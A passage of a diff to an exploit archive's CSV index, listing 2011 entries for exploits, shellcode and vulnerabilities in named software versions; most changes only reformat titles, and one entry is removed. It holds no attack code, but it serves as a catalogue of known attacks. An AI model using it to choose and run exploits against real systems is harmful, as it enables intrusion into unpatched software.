1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 @@ -15097,7 +15095,7 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Remote BoF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 +17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Remote BoF (post-auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 @@ -15107,16 +15105,16 @@ id,file,description,date,author,platform,type,port 17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - (l param) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 -17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 +17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,Metasploit,windows,remote,0 -17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 +17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 -17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,Metasploit,windows,remote,0 +17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow",2011-06-12,Metasploit,windows,remote,0 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion (0Day)",2011-06-13,jdc,php,webapps,0 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 @@ -15135,7 +15133,7 @@ id,file,description,date,author,platform,type,port 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0 -17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 +17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder - (id) Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 @@ -15154,7 +15152,7 @@ id,file,description,date,author,platform,type,port 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 -17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 +17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 @@ -15210,7 +15208,7 @@ id,file,description,date,author,platform,type,port 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps,0 -17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 +17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U - DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (.MPPL) Stack Buffer Overflow",2011-07-07,Metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 @@ -15231,7 +15229,7 @@ id,file,description,date,author,platform,type,port 17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Xmap 1.2.11 Joomla Component - Blind SQL Injection",2011-07-12,jdc,php,webapps,0 -17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 PASV Buffer Overflow PoC",2011-07-12,"Craig Freyman",windows,remote,0 +17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 - PASV Buffer Overflow PoC",2011-07-12,"Craig Freyman",windows,remote,0 17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection",2011-07-13,"Robert Cooper",php,webapps,0 17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injection",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"SOBI2 2.9.3.2 Joomla! Component - Blind SQL Injections",2011-07-14,jdc,php,webapps,0 @@ -15271,7 +15269,7 @@ id,file,description,date,author,platform,type,port 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 - SVG Remote Code Execution Exploit (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 -17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 +17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart 1.1.7 - Blind time-based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0 @@ -15309,7 +15307,6 @@ id,file,description,date,author,platform,type,port 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 - session hijacking",2011-08-07,seth,php,webapps,0 -17626,platforms/windows/remote/17626.rb,"PXE Exploit server",2011-08-05,Metasploit,windows,remote,0 17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 @@ -15319,7 +15316,7 @@ id,file,description,date,author,platform,type,port 17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass Exploit",2011-08-07,"C4SS!0 G0M3S",windows,local,0 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL Interface Universal Path Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 -17638,platforms/windows/dos/17638.py,"LiteServe 2.81 PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 +17638,platforms/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent XSS",2011-08-08,v0nSch3lling,php,webapps,0 17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent XSS",2011-08-09,Paulzz,php,webapps,0 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection",2011-08-09,p0pc0rn,php,webapps,0 @@ -15337,12 +15334,12 @@ id,file,description,date,author,platform,type,port 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,Metasploit,windows,remote,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 -17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 +17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"videoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 -17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 +17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0 @@ -15350,7 +15347,7 @@ id,file,description,date,author,platform,type,port 17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component - Local File Inclusion",2011-08-17,NoGe,php,webapps,0 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0 -17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin LIST command Remote Heap Overflow PoC",2011-08-17,0in,windows,dos,0 +17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow PoC",2011-08-17,0in,windows,dos,0 17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 @@ -15370,11 +15367,11 @@ id,file,description,date,author,platform,type,port 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd - Remote Denial of Service (Memory Exhaustion)",2011-08-19,kingcope,multiple,dos,0 17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care - XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,Metasploit,windows,remote,0 -17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 +17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - (xfr.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 -17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) Stored XSS",2011-08-20,"Eyup CELIK",php,webapps,0 +17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Stored XSS",2011-08-20,"Eyup CELIK",php,webapps,0 17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit - Remote File Inclusion",2011-08-21,"koskesh jakesh",php,webapps,0 17706,platforms/php/webapps/17706.pl,"onefilecms 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 @@ -15476,7 +15473,7 @@ id,file,description,date,author,platform,type,port 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service PoC",2011-09-09,modpr0be,windows,dos,0 17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - (.zip) Buffer Overflow Exploit (0Day)",2011-09-12,mr_me,windows,local,0 -17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post Auth Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 +17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Auth Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - (.pll) Buffer Overflow Exploit",2011-09-12,"Iván García Ferreira",windows,local,0 @@ -15512,7 +15509,7 @@ id,file,description,date,author,platform,type,port 17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 - (download.php) Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - (edit.php) HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 -17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 +17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 - .m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,Metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow Exploit (DoS PoC)",2011-09-18,loneferret,windows,dos,21 17860,platforms/php/webapps/17860.txt,"WordPress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 @@ -15529,14 +15526,14 @@ id,file,description,date,author,platform,type,port 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugin - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 -17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 +17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Auth Bypass / CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,windows,local,0 17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO",2011-09-20,Metasploit,windows,local,0 17882,platforms/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Remote Arbitrary File Upload Exploit",2011-09-22,EgiX,php,webapps,0 -17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 +17883,platforms/hardware/remote/17883.txt,"Blue Coat Reporter - Unauthenticated Directory Traversal",2011-09-22,nitr0us,hardware,remote,0 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow Exploit",2011-09-22,mr_me,windows,remote,0 17885,platforms/windows/dos/17885.txt,"sunway forcecontrol 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server - Buffer Overflow Exploit (DEP Bypass)",2011-09-23,blake,windows,remote,0 @@ -15552,7 +15549,7 @@ id,file,description,date,author,platform,type,port 17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 -17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 +17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - (nprosec.sys) Local Privilege Escalation (0Day)",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 @@ -15572,7 +15569,7 @@ id,file,description,date,author,platform,type,port 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel Admin Auth Bypass",2011-10-04,Jasman,php,webapps,0 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0 17928,platforms/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - (.ashprj) Heap Overflow",2011-10-04,LiquidWorm,windows,dos,0 -17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 PDF File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 +17929,platforms/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - .PDF File Handling Memory Corruption",2011-10-04,"Mario Gomes",windows,dos,0 17930,platforms/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101 - Linux Local Privilege Escalation",2011-10-05,zx2c4,linux,local,0 @@ -15598,10 +15595,10 @@ id,file,description,date,author,platform,type,port 17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps,0 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection",2011-10-12,Mario_Vs,php,webapps,0 17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 -17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 +17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 -17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 +17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 - XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 17958,platforms/php/webapps/17958.txt,"cotonti CMS 0.9.4 - Multiple Vulnerabilities",2011-10-10,LiquidWorm,php,webapps,0 17959,platforms/php/webapps/17959.txt,"POSH - Multiple Vulnerabilities",2011-10-10,Crashfr,php,webapps,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 @@ -15627,7 +15624,7 @@ id,file,description,date,author,platform,type,port 17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 -17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 +17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 17992,platforms/php/webapps/17992.txt,"Gnuboard 4.33.02 - tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"NoNumber Framework Joomla! Plugin - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Shellcode Encoder (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0 @@ -15640,10 +15637,10 @@ id,file,description,date,author,platform,type,port 18003,platforms/php/webapps/18003.txt,"fims File Management System 1.2.1a - Multiple Vulnerabilities",2011-10-20,Skraps,php,webapps,0 18004,platforms/php/webapps/18004.txt,"Simple Free PHP Forum Script - SQL Injection",2011-10-20,Skraps,php,webapps,0 18005,platforms/windows/webapps/18005.txt,"OCS Inventory NG 2.0.1 - Persistent XSS",2011-10-20,"Nicolas DEROUET",windows,webapps,0 -18006,platforms/windows/dos/18006.html,"Opera 11.52 PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 -18007,platforms/windows/dos/18007.txt,"Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 +18006,platforms/windows/dos/18006.html,"Opera 11.52 - PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0 +18007,platforms/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 -18009,platforms/asp/webapps/18009.txt,"Pre Studio Business Cards Designer SQL Injection",2011-10-20,dr_zig,asp,webapps,0 +18009,platforms/asp/webapps/18009.txt,"Pre Studio Business Cards Designer - SQL Injection",2011-10-20,dr_zig,asp,webapps,0 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0 18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI - Stored XSS",2011-10-20,"Stefan Schurtz",multiple,webapps,0 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0 @@ -15657,7 +15654,7 @@ id,file,description,date,author,platform,type,port 18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection 